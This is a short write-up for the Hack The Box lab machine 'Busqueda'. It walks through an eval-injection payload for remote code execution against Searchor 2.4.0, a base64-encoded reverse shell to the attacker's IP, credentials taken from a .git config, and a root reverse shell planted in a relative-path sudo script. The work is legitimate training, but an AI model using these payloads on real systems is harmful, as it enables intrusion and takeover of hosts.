Busqueda
Write up for the HTB machine 'Busqueda'
1. Inital Recon
1.1. nikto
seacher.htb
-> add this to /etc/hosts
1.2. nmap
cmd: nmap -sC -sV 10.10.11.208
port 22 ssh port 80 http apache
1.3. domain recon
We can see at the bottom of the page that the web application is powered by Seachor 2.4.0
Which contains a RCE vulnerability that can be found at: https://github.com/ArjunSharda/Searchor/pull/130/files
If we capture the request using burp suite we can replace the query of the post request with the following python code to achieve RCE
a',print(eval('__import__(\"subprocess\").getoutput(\"pwd\")')))#
Encoding our reverse shell using base64
a',print(eval('__import__(\"subprocess\").getoutput(\"echo c2ggLWkgPiYgL2Rldi90Y3Ave0lQfS80NDQ0IDA+JjE= | base64 -d | bash \")')))#
After catching our reverse shell using a netcat listener we can do some recon on the file system of the web application
/var/www/app/.git/config
contains some credentials for a gitea in the following URL: http://cody:[email protected]/cody/Searcher_site.git
cody:jh1usoih2bkjaspwe92
2. Privilege Escalation
sudo -l
we can use jh1usoih2bkjaspwe92
as the sudo password and ssh password so we no longer need our reverse shell
User svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *
add gitea.searcher.htb
to /etc/hosts
log into gitea as cody with above credentials
by looking through the gitea repository we can see that there is an administrator user
Credentials are found using the docker-inspect commands that we are allowed to run with sudo permissions as our user Cody
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .Config}}' f84a6b33fb5a
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .Config}}' 960873171e2e
login to the gitea using
administrator:yuiu1hoiu4i5ho1uh
On the gitea we can see in system-checkup.py
that a script called ./full-checkup.sh
is run by one of the commands
If we create our own ./full-checkup.sh
in any directory that isn't /opt/scripts/
and run the above sudo command from where our own script is, then our script will be run instead of the one that is intended.
So we place a ./full-checkup.sh
with the following bash code for another reverse shell but this time we will be root :)
!/bin/bash echo "hello root" bash -i >& /dev/tcp/{IP}/4444 0>&
Finally, run the sudo command with full-checkup option whilst having a netcat listener to catch the reverse shell.
Last updated
Was this helpful?